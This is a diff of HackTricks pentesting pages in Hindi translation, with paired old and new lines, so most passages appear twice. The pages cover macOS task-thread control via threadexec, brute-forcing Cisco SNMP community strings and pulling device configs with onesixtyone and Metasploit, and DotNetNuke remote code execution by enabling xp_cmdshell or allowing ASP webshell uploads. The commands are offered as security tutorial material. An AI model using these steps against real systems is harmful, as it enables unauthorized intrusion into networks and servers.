1. **मनमानी मेमोरी ऑपरेशन्स**:
- साझा क्षेत्र से डेटा की प्रतिलिपि बनाने के लिए `memcpy()` का उपयोग करके मनमानी मेमोरी पढ़ाई करें।
- साझा क्षेत्र में डेटा स्थानांतरित करने के लिए `memcpy()` का उपयोग करके मनमानी मेमोरी लिखाई करें।
1. **विचारशील मेमोरी परिचालन**:
- साझा क्षेत्र से डेटा कॉपी करने के लिए `memcpy()` को आह्वान करके विचारशील मेमोरी पढ़ाई करें।
- साझा क्षेत्र में डेटा स्थानांतरित करने के लिए `memcpy()` का उपयोग करके विचारशील मेमोरी लिखें।
2. **बहु-तर्क वाले फंक्शन कॉल्स को संभालना**:
- 8 से अधिक तर्कों की आवश्यकता वाले फंक्शन्स के लिए, अतिरिक्त तर्कों को कॉलिंग कन्वेंशन के अनुसार स्टैक पर व्यवस्थित करें।
2. **एकाधिक तर्कों के साथ फ़ंक्शन कॉल का संचालन**:
- 8 से अधिक तर्कों की आवश्यकता वाले फ़ंक्शनों के लिए, कॉलिंग कन्वेंशन के अनुसार अतिरिक्त तर्कों को स्टैक पर व्यवस्थित करें।
3. **Mach पोर्ट ट्रांसफर**:
- पहले से स्थापित पोर्ट्स के माध्यम से Mach संदेशों के माध्यम से कार्यों के बीच Mach पोर्ट्स का स्थानांतरण करें।
3. **Mach पोर्ट स्थानांतरण**:
- पहले स्थापित पोर्ट के माध्यम से Mach संदेशों के माध्यम से कार्यों के बीच Mach पोर्ट स्थानांतरित करें।
4. **फाइल डिस्क्रिप्टर ट्रांसफर**:
- `triple_fetch` में Ian Beer द्वारा उजागर की गई तकनीक, fileports का उपयोग करके प्रक्रियाओं के बीच फाइल डिस्क्रिप्टर्स का स्थानांतरण करें।
4. **फ़ाइल डिस्क्रिप्टर स्थानांतरण**:
- `triple_fetch` में उजागर किए गए तकनीक फाइलपोर्ट का उपयोग करके प्रक्रियाओं के बीच फ़ाइल डिस्क्रिप्टर स्थानांतरित करें।
यह व्यापक नियंत्रण [threadexec](https://github.com/bazad/threadexec) पुस्तकालय में समाहित है, जो विस्तृत कार्यान्वयन और पीड़ित प्रक्रिया के साथ इंटरैक्शन के लिए एक उपयोगकर्ता-अनुकूल API प्रदान करता है।
यह व्यापक नियंत्रण [threadexec](https://github.com/bazad/threadexec) पुस्तकालय में समाहित है, जो पीड़ित प्रक्रिया के साथ बातचीत के लिए एक विस्तृत कार्यान्वयन और एक उपयोगकर्ता मित्रपूर्ण API प्रदान करता है।
## महत्वपूर्ण विचार:
- सिस्टम स्थिरता और डेटा अखंडता बनाए रखने के लिए मेमोरी पढ़ने/लिखने के ऑपरेशन्स के लिए `memcpy()` का सही उपयोग सुनिश्चित करें।
- Mach पोर्ट्स या फाइल डिस्क्रिप्टर्स का स्थानांतरण करते समय, उचित प्रोटोकॉल का पालन करें और लीक या अनचाही पहुंच से बचने के लिए संसाधनों को जिम्मेदारी से संभालें
- सिस्टम स्थिरता और डेटा अखंडता बनाए रखने के लिए मेमोरी पढ़ने/लिखने के लिए `memcpy()` का उचित उपयोग सुनिश्चित करें।
- Mach पोर्ट या फाइल डिस्क्रिप्टर स्थानांतरण करते समय, उचित प्रोटोकॉल का पालन करें और संसाधनों को जिम्मेदारीपूर्वक संभालने के लिए सुनिश्चित करें ताकि लीक या अनहेतु पहुंच से बचा जा सके
इन दिशानिर्देशों का पालन करते हुए और `threadexec` पुस्तकालय का उपयोग करते हुए, कोई भी कुशलतापूर्वक प्रक्रियाओं का प्रबंधन और इंटरैक्शन कर सकता है, लक्षित प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर सकता है
इन दिशानिर्देशों का पालन करके और `threadexec` पुस्तकालय का उपयोग करके, किसी भी लक्ष्य प्रक्रिया पर पूर्ण नियंत्रण प्राप्त करने के लिए प्रक्रियाओं को सूक्ष्म स्तर पर प्रबंधित और बातचीत कर सकते हैं
# संदर्भ
* https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में शामिल हों या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
</details>
* [https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/](https://bazad.github.io/2018/10/bypassing-platform-binary-task-threads/)

View file

@ -1,45 +1,45 @@
# Cisco SNMP
# सिस्को SNMP
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
# Cisco नेटवर्क्स की पेंटेस्टिंग
# सिस्को नेटवर्क्स का पेंटेस्टिंग
SNMP एक प्रोटोकॉल है जिसका उपय कंप्यूटर नेटवर्क पर उपकरणों की स्थिति की निगरानी के लिए किया जाता है। यह UDP ट्रांसपोर्ट लेयर प्रोटोकॉल पर काम करता है जिसके पोर्ट नंबर 161/UDP और 162/UDP होते हैं।
SNMP एक प्रोटोकॉल है जो कंप्यूटर नेटवर्क पर डिवाइसों की स्थिति का मॉनिटरिंग के लिए उपयोग किया जाता है। यह UDP परिवहन परत प्रोटोकॉल पर काम करता है जिसमें पोर्ट संख्याएं 161/UDP और 162/UDP शामिल हैं।
SNMP कम्युनिटी स्ट्रिंग्स का उपयोग करता है, जो SNMP एजेंट्स और सर्वरों के बीच संचार के लिए पासवर्ड की तरह काम करते हैं। ये कम्युनिटी स्ट्रिंग्स **केवल-पढ़ने (RO) या पढ़ने-लिखने (RW) की अनुमतियाँ** प्रदान करते हैं। पेंटेस्टर्स SNMP का शोषण कर सकते हैं **कम्युनिटी स्ट्रिंग्स को ब्रूट-फोर्सिंग** करके नेटवर्क उपकरणों तक पहुँच प्राप्त करने के लिए
SNMP में कम्युनिटी स्ट्रिंग का उपयोग किया जाता है, जो SNMP एजेंट्स और सर्वरों के बीच संचार के लिए पासवर्ड के रूप में काम करते हैं। ये कम्युनिटी स्ट्रिंग्स **केवल पढ़ने या लिखने (RO) अनुमतियाँ** प्रदान करते हैं। पेंटेस्टर्स सिस्को नेटवर्क उपकरणों तक पहुंच प्राप्त करने के लिए SNMP का शोध करके **कम्युनिटी स्ट्रिंग्स को ब्रूट-फोर्सिंग** कर सकते हैं
कम्युनिटी स्ट्रिंग्स पर ब्रूट-फोर्स हमला करने के लिए **[onesixtyone](https://github.com/trailofbits/onesixtyone)** का उपयोग किया जा सकता है। इस टूल को ब्रूट-फोर्सिंग के लिए एक शब्दकोश और लक्ष्य होस्ट्स के IP पते की आवश्यकता होती है:
कम्युनिटी स्ट्रिंग्स पर ब्रूट-फोर्स हमला करने के लिए **[onesixtyone](https://github.com/trailofbits/onesixtyone)** का उपयोग किया जा सकता है। इस टूल को ब्रूट-फोर्सिंग के लिए एक शब्दकोश और लक्ष्य होस्टों के आईपी पते की आवश्यकता होती है:
```bash
onesixtyone -c communitystrings -i targets
```
यदि **कम्युनिटी स्ट्रिंग्स का पता चल जाता है**, तो आगे का शोषण संभव हो जाता है।
यदि **कम्युनिटी स्ट्रिंग्स** पता चल जाएं, तो आगे और अधिक उत्पीड़न संभव हो जाता है।
### `cisco_config_tftp`
Metasploit फ्रेमवर्क में `cisco_config_tftp` मॉड्यूल का उपयोग करके, **डिवाइस कॉन्फ़िगरेशन** को कम्युनिटी स्ट्रिंग के मूल्य को जानकर खींचा जा सकता है। **रीड-राइट (RW) अनुमतियों वाली कम्युनिटी स्ट्रिंग की आवश्यकता होती है**।
`Metasploit` फ्रेमवर्क में `cisco_config_tftp` मॉड्यूल का उपयोग करके, **डिवाइस कॉन्फ़िगरेशन** को कम्युनिटी स्ट्रिंग के मान को जानकर खींचा जा सकता है। **पढ़ने-लिखने (RW) अनुमतियों वाली कम्युनिटी स्ट्रिंग की आवश्यकता है**।
निम्नलिखित पैरामीटर्स की आवश्यकता होती है:
निम्नलिखित पैरामीटर आवश्यक है:
- RW कम्युनिटी स्ट्रिंग (COMMUNITY)
- हमलावर का IP पता (LHOST)
- लक्ष्य उपकरण का IP पता (RHOSTS)
- डिवाइस कॉन्फ़िगरेशन की आउटपुट डायरेक्टरी के लिए पथ (OUTPUTDIR)
- हमलावर का आईपी पता (LHOST)
- लक्ष्य उपकरण का आईपी पता (RHOSTS)
- डिवाइस कॉन्फ़िगरेशन के आउटपुट निर्देशिका के लिए पथ (OUTPUTDIR)
मॉड्यूल को कॉन्फ़िगर करने के बाद, शोषण को आरंभ किया जा सकता है। निर्दिष्ट IP पते के साथ होस्ट कॉन्फ़िगरेशन निर्दिष्ट फ़ोल्डर में डाउनलोड किया जाएगा।
मॉड्यूल कॉन्फ़िगर करने के बाद, उत्पीड़न प्रारंभ किया जा सकता है। निर्दिष्ट आईपी पते वाले होस्ट कॉन्फ़िगरेशन को निर्दिष्ट फ़ोल्डर में डाउनलोड किया जाएगा।
### `snmp_enum`
Metasploit फ्रेमवर्क में **`snmp_enum` मॉड्यूल लक्ष्य हार्डवेयर के बारे में जानकारी की प्राप्ति की अनुमति देता है**। पिछले मॉड्यूल की तरह, COMMUNITY पैरामीटर (यहां तक कि केवल पढ़ने की अनुमति वाला स्ट्रिंग) और लक्ष्य डिवाइस का IP पता आवश्यक है:
`Metasploit` फ्रेमवर्क में **`snmp_enum` मॉड्यूल लक्ष्य हार्डवेयर के बारे में जानकारी प्राप्त करने की अनुमति देता है**। पिछले मॉड्यूल की तरह, COMMUNITY पैरामीटर (केवल पढ़ने वाली अनुमतियों वाली स्ट्रिंग भी) और लक्ष्य उपकरण का आईपी पता आवश्यक हैं:
```bash
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
@ -48,14 +48,15 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
# संदर्भ
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाओं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** पर मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -2,32 +2,32 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके।
</details>
## Firebase क्या है
Firebase मुख्य रूप से मोबाइल एप्लिकेशन के लिए एक बैकएंड-जैसी सेवा है। यह बैकएंड प्रोग्रामिंग का भार हटाने पर ध्यान केंद्रित है और एक अच्छी SDK के साथ साथ अन्य कई रोचक चीजें प्रदान करके एप्लिकेशन और बैकएंड के बीच अंतराक्रिया को सुगम बनाने पर ध्यान केंद्रित है।
Firebase एक बैकएंड-एस-एस है जो मुख्य रूप से मोबाइल एप्लिकेशन के लिए है। यह प्रोग्रामिंग बैकएंड की जिम्मेदारी को हटाने पर ध्यान केंद्रित है और एक अच्छी एसडीके के साथ साथ अन्य कई रोचक चीजें प्रदान करता है जो एप्लिकेशन और बैकएंड के बीच बातचीत को सुविधाजनक बनाता है।
जानें Firebase के बारे में और:
Firebase के बारे में अधिक जानें:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** में PR जमा करके।
</details>

View file

@ -1,26 +1,26 @@
# DotNetNuke (DNN)
# डॉटनेटन्यूक (DNN)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
## DotNetNuke (DNN)
## डॉटनेटन्यूक (DNN)
यदि आप DNN में **व्यवस्थापक** के रूप में प्रवेश करते हैं, तो RCE प्राप्त करना आसान हो जाता है।
यदि आप DNN में **प्रशासक** के रूप में प्रवेश करते हैं तो RCE प्राप्त करना आसान है।
## RCE
### SQL के माध्यम से
**`Settings`** पृष्ठ के तहत एक SQL कंसोल उपलब्ध होता है जहां आप **`xp_cmdshell`** को सक्षम कर सकते हैं और **ऑपरेटिंग सिस्टम के कमांड चला सकते हैं**।
**`सेटिंग्स`** पृष्ठ के तहत एक SQL कंसोल उपलब्ध है जहाँ आप **`xp_cmdshell`** को सक्षम कर सकते हैं और **ऑपरेटिंग सिस्टम कमांड चला सकते हैं**।
**`xp_cmdshell`** को सक्षम करने के लिए इन लाइनों का उपयोग करें:
```sql
@ -29,32 +29,32 @@ RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
और **"Run Script"** दबाएं ताकि वह sQL वाक्यों को चलाएं।
और **"Run Script"** दबाएं ताकि वह sQL वाक्य चल सकें।
फिर, निम्नलिखित की तरह कुछ इस्तेमाल करें ताकि ओएस कमांड चलाएं:
फिर, निम्नलिखित की तरह OS कमांड चलाने के लिए कुछ इस्तेमाल करें:
```sql
xp_cmdshell 'whoami'
```
### ASP वेबशेल के माध्यम से
### एएसपी वेबशेल के माध्यम से
`सेटिंग्स -> सुरक्षा -> अधिक -> अधिक सुरक्षा सेटिंग्स` में आप `अनुमति योग्य फ़ाइल एक्सटेंशन` के तहत **नए अनुमत एक्सटेंशन जोड़ सकते हैं**, और फिर `सेव करें` बटन पर क्लिक करें।
`सेटिंग्स -> सुरक्षा -> अधिक -> अधिक सुरक्षा सेटिंग्स` में आप **अनुमत फ़ाइल एक्सटेंशन जोड़ सकते हैं** अधिकतम फ़ाइल एक्सटेंशन के तहत, और फिर `सेव करने` बटन पर क्लिक करें।
